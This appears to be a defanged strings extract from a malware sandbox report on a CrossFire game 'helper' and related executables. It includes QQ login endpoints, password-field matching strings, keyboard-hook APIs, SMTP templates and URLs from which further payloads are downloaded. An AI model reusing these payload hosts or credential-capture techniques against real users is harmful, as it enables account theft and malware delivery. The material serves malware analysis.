&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一æâ€Â¯Ã§Â©Â¿Ã¤Âºâ€˜Ã§Â®Â Ã¥ÂÆ’军万马æÂ¥ç›¸è§Â。
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一æâ€Â¯Ã§Â©Â¿Ã¤Âºâ€˜Ã§Â®Â Ã¥ÂÆ’军万马æÂ¥ç›¸è§Â。
08 08 08 50
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
hXXps://aq.qq.com/cn2/safe_service/device_lock
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
http2://ossweb
hXXp://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"hXXp://(.*?)":{
"~ /1~!
"~ /1~!
fD.nn'1r?
fD.nn'1r?
.KM8'
.KM8'
$&%cw]
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
|322|
*&checkparam=cf|yes|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
sMsg" : "
\gzip.dll
\gzip.dll
`.data
`.data
gzip.pdb
gzip.pdb
_u%SV
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://cfzhushou.com/pay.html
hXXp://cfzhushou.com/pay.html
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
game.qq.com
game.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXp://cf.qq.com/cfvip/
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
hXXp://xinyue.qq.com
o%%co
o%%co
``PBi %c
``PBi %c
;ptlogin2
;ptlogin2
apps.game.qq.com
apps.game.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
nickName":"
?kernel32.dll
?kernel32.dll
{56FDF344-FD6D-11d0-958A-006097C9A090}
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
Report
themepassword
themepassword
SysShadow.HostWnd
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
VBScript.RegExp
1970-01-01 00:00:00
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
']?(.*?)[#
onkeydown|
onkeydown|
onkeyup|
onkeyup|
onkeypress|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
text|password|file
?)-D%f`
?)-D%f`
location.reload()
location.reload()
window.location.href="
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
WarnOnHTTPSToHTTPRedirect
WarnOnHTTPSToHTTPRedirect
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
type=password
type=password
[password]
[password]
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
var jies = document.getElementsByTagName('object');for(var jie in jies){if(jies[jie].classid=='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000'){jies[jie].removeNode(true);}}
user.qzone.qq.com
user.qzone.qq.com
mail.qq.com
mail.qq.com
onkeyup
onkeyup
type='password'
type='password'
type="password"
type="password"
, 1, , ,
, 1, , ,
var jie = document.createStyleSheet();jie.addRule('html','
var jie = document.createStyleSheet();jie.addRule('html','
').value="
').value="
document.getElementById('
document.getElementById('
LocationURL
LocationURL
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
{34A715A0-6587-11D0-924A-0020AFC7AC4D}
SysShadow.Menu
SysShadow.Menu
Microsoft.XMLDOM
Microsoft.XMLDOM
14:00~16:00
14:00~16:00
12:00-19:00
12:00-19:00
1.2.18
1.2.18
%*.*f
%*.*f
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
WSOCK32.dll
WSOCK32.dll
msscript.ocx
msscript.ocx
VVV.dywt.com.cn
VVV.dywt.com.cn
USER32.DLL
USER32.DLL
\\.\Smartvsd
\\.\Smartvsd
\\.\PhysicalDrive%d
\\.\PhysicalDrive%d
\\.\Scsi%d:
\\.\Scsi%d:
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
(*.htm;*.html)|*.htm;*.html
its:%s::%s
its:%s::%s
(*.avi)|*.avi
(*.avi)|*.avi
WPFT532.CNV
WPFT532.CNV
WPFT632.CNV
WPFT632.CNV
EXCEL32.CNV
EXCEL32.CNV
write32.wpc
write32.wpc
Windows Write
Windows Write
mswrd632.wpc
mswrd632.wpc
Word for Windows 6.0
Word for Windows 6.0
wword5.cnv
wword5.cnv
Word for Windows 5.0
Word for Windows 5.0
mswrd832.cnv
mswrd832.cnv
mswrd632.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
Word 6.0/95 for Windows & Macintosh
html32.cnv
html32.cnv
.PAVCOleException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
right-curly-bracket
right-curly-bracket
left-curly-bracket
left-curly-bracket
0123456789
0123456789
c:\%original file name%.exe
c:\%original file name%.exe
GetKeyboardState
GetKeyboardState
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
1.0.15.507
1.0.15.507
T%Program Files%\NamuADLook.dll
T%Program Files%\NamuADLook.dll
mscoree.dll
mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
1.3.6.1
(*.*)
(*.*)
1.0.0.0
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
6.0.2600.0
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
%original file name%.exe_3308_rwx_01FE0000_00013000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
1.2.3
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
inflate 1.2.3 Copyright 1995-2005 Mark Adler
%c%c%c%c%c%c%c%c%c%c
%c%c%c%c%c%c%c%c%c%c
MSVCRT.dll
MSVCRT.dll
KERNEL32.dll
KERNEL32.dll
zlib1.dll
zlib1.dll
!"#$%&'()* ,-./012
!"#$%&'()* ,-./012
DLL support by Alessandro Iacopetti & Gilles Vollant
DLL support by Alessandro Iacopetti & Gilles Vollant
TcService.exe_2764:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
CF_Helper.dll
CF_Helper.dll
wininet.dll
wininet.dll
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
\CF_Helper.dll
@.reloc
@.reloc
HTTP/1.1
HTTP/1.1
%Program Files%\sesvcs_%d_56089.exe
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
\xxx\Helper.pdb
Helper.dll
Helper.dll
KERNEL32.dll
KERNEL32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
InternetCrackUrlA
InternetCrackUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
true
true
7.84888
7.84888
6 696?6{6
6 696?6{6
14686
14686
5 5(50585
5 5(50585
? ?$?,?@?`?
? ?$?,?@?`?
>$>0>4>8>
>$>0>4>8>
https
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
http=
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXps://
hXXp://
hXXp://
crossfire.exe
crossfire.exe
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
user32.dll
user32.dll
iphlpapi.dll
iphlpapi.dll
SHLWAPI.dll
SHLWAPI.dll
MPR.dll
MPR.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
WinExec
WinExec
GetKeyState
GetKeyState
USER32.dll
USER32.dll
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
COMCTL32.dll
COMCTL32.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
Kernel32.dll
Kernel32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
C:\TcService.exe
C:\TcService.exe
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX